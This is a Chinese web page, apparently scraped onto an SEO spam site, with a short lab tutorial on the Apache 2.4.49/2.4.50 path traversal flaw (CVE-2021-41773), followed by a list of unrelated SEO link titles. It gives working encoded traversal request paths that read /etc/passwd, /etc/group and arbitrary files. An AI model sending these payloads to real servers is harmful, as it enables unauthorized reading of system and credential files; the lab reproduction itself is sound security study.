当前位置: 首页 > news >正文

公司网站制作企业最近发生的热点新闻

公司网站制作企业,最近发生的热点新闻,广东专业做网站排名公司哪家好,备案 如何方便以后做其他网站中间件安全:Apache 目录穿透.(CVE-2021-41773) Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等&#xff0c…

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。


目录:

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客

漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )

第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.


Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客


漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )


第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.

# 查找存储用户账户信息,包括用户名和用户 ID
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd# 查找存储组信息,包括组名和组成员
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/group# 如果需要查看别的目录信息,则替换后面的就行.
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/目录路径

    

    

    

学习链接:第59天:服务攻防-中间件安全_CVE复现_IIS_Apache_Tomcat_Nginx_哔哩哔哩_bilibili

http://www.mmbaike.com/news/54552.html

相关文章:

  • 怎样在一个虚拟服务器里做两个网站百度推广需要多少钱
  • 做个公司网站需要什么钱杭州互联网公司排名榜
  • 翻墙到国外网站怎么做深圳百度推广开户
  • 自己制作logo免费生成器北京搜索关键词优化
  • 制作公司网站要多少费用呢百度指数是啥
  • 做网站在哪里网站的营销推广
  • 怎么查看网站访问速度外包公司的人好跳槽吗
  • 模板网官网免费seo推广专员
  • 简历旅游网站开发经验app推广方案怎么写
  • 苍南做网站哪里找营销推广是什么
  • 石家庄网站制作费用手机优化大师官网
  • 医药类网站建设评价公司宣传软文
  • 重庆网站建设的意义seo优化培训班
  • 深圳做网站三网合一网站优化哪个公司好
  • 大学生做家教靠谱网站2020年百度搜索排名
  • 信用网站建设方案搜索引擎优化简称
  • 广西贵港建设集团有限公司网站网络营销推广主要做什么?
  • 张家港网站制作公司百度云网盘资源搜索
  • 辽宁省兴城做网站的百度seo关键词优化排名
  • 网站建设和维护pdf北京优化网站推广
  • 中山做网站哪家便宜色盲测试图片
  • 做图剪片文案网站app接单湖南网站网络推广哪家奿
  • 池州网站建设怎么样杭州最专业的seo公司
  • 牡丹江网站建设兼职南昌seo网站推广
  • 合肥网站设计建设南京关键词网站排名
  • 高端大气网站seo优化排名怎么做
  • wordpress管理地址在哪里设置厦门seo代理商
  • 专业做幼儿园设计的网站近期的时事热点或新闻事件
  • 做民宿的网站百度竞价开户流程
  • 技术支持::天空网络-临汾做网站谷歌浏览器2021最新版